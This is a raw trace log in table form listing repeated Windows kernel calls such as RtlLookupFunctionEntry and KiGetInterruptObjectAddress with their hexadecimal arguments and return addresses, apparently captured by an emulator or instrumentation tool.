| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c9fb0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8254 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417ca300, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8260 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4128 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f38, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c75b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c8128 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4130 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4138 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f48, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4140 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f50, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4148 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f58, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4150 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f60, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4158 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f68, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4160 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f70, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4168 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f78, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4170 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4178 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f88, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4180 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f90, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4188 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7f98, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4190 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fa0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4198 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fa8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41a0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fb0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41a8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fb8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41b0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fc0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41b8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fc8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41c0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fd0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41c8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fd8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41d0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fe0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41d8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7fe8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41e0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7ff0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41e8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c7ff8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41f0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8000, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a41f8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8008, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4200 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8010, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c73c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c811c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4208 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8018, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4210 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8020, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4218 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8028, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4220 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8030, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4228 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8038, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4230 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8040, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4238 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8048, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4240 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8050, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4248 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8058, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4250 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8060, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4258 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8068, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4260 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8070, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4268 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8078, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4270 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8080, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4278 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8088, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4280 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8090, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c73c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c811c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4288 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8098, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4290 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4298 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80a8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42a0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42a8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80b8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42b0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42b8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80c8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42c0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42c8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80d8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42d0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42d8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80e8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42e0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42e8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c80f8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42f0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8100, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a42f8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8108, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4300 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8110, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c73c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c811c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4308 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8118, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4310 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8120, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4318 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8128, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4320 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8130, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4328 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8138, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4330 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8140, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4338 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8148, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4340 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8150, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4348 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8158, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4350 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8160, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4358 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8168, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4360 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8170, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4368 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8178, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4370 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8180, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4378 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8188, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4380 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8190, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c73c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c811c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4388 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8198, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c6ca0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c80e0 |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4390 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4398 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81a8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43a0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43a8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81b8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43b0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43b8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81c8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43c0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43c8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81d8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43d0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43d8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81e8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43e0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43e8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c81f8, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43f0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8200, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a43f8 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8208, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4400 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8210, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c73c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c811c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
| KiGetInterruptObjectAddress | ret_val_out = 0xfffff800419a4408 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c8218, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff800417c73c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d206b68, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0xfffff800419c811c |
| RtlSectionTableFromVirtualAddress | ret_val_out = 0xfffff80041684210 |
